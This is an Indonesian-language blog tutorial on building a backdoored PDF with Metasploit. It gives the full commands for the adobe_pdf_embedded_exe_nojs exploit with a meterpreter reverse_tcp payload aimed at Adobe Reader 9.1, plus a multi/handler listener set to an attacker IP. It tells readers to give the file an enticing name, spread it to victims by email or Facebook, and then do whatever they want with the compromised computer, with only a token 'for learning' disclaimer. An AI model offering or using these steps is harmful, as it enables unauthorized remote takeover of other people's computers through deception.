Exploit Windows Menggunakan PDF dengan Metasploit

Haii bro, kali ini saya akan memberikan tutorial mengenai Cara Exploit Windows Menggunakan PDF dengan Metasploit, Apa itu Metasploit? Metasploit merupakan sebuah tools penetration testing yang sangat berbahaya, dengan metasploit kita bisa masuk bahkan dapat menguasai sistem orang lain, namun agar bisa masuk ke sistem orang lain menggunakan metasploit tidak mudah, untuk itu kita harus memebuat backdoor yang digunakan untuk jalan masuk ke sistem korban.

nah untuk menyamarkan backdor tersebut pada tutorial ini saya membuat backdoor dengan format file .pdf
oke langsung saja simak langkah-langkahnya :

Tested :  Windows 7 Ultimate 32bit
Vulnerable Application Testing : Adobe Reader 9.1

pertama jalankan terlebih dahulu service postgresql dan metasploit
service postgresql start
service metasploit start
service postgresql start

Selanjutnya buka metasploit, dengan perintah
msfconsole
msfconsole

 setelah metasploit terbuka ketikkan perintah di bawah ini satu satu-persatu
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
set payload windows/meterpreter/reverse_tcp
set filename Ebook_Hacking.pdf
set lhost 192.168.1.106
set lport 443
exploit
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Keterangan:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs --> Type exploit yang digunakan
set payload windows/meterpreter/reverse_tcp --> Mengatur payload yang di gunakan ke sebuah target ketika shell sudah terpasang
set filename Ebook_Hacking.pdf --> Nama file backdor, buat semenarik mungkin agar korban penasaran untuk membukanya
set lhost 192.168.1.106 --> Ip Attacker, isi sesuai dengan IP anda
set lport 443 --> Port Listener, saya menggunakan port 443 karena selalu terbuka
exploit --> Perintah untuk menghasilkan file PDF (backdoor)

Setelah berhasil menghasilkan PDF, file PDF akan tersimpan di folder /root/.msf4/local/(nama pdf). folder .msf4 ini biasanya tersembunyi, untuk memunculkan .msf4 kalian tinggal tekan keyborad CTRL+H

tahap diatas adalah pembuatan backdoor, selanjutnya kita jalankan exploit, ketikkan perintah berikut pada terminal
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 443
set lhost 192.168.1.106 (sesuaikan ip kalian)
exploit
set payload windows/meterpreter/reverse_tcp

Sekarang kalian sebarkan file pdf(backdoor) yang dibuat tadi melaui email, faceebook, dll terserah bagaimana caranya agar korban membuka file pdf(backdoor) tersebut

Meterpreter sessions opened

meterpreter sessions opened :D, itu tandanya kita sudah masuk ke sistem korban, apabila sudah sampai tahap ini terserah kalian mau diapain komputer korban :D, untuk perintah-perintah meterpreter yang lain kalian bisa cari sendiri di google.

sekian dulu tutorial kali ini mengenai Exploit Windows Menggunakan PDF dengan Metasploit semoga bermanfaat, tutorial ini saya buat hanya untuk pembelajaran saja, apabila ada penyalahgunaan dari tutorial ini itu diluar tanggung jawab saya, gunakan ilmu dengan bijak.

Subscribe to receive free email updates:

0 Response to "Exploit Windows Menggunakan PDF dengan Metasploit"

Posting Komentar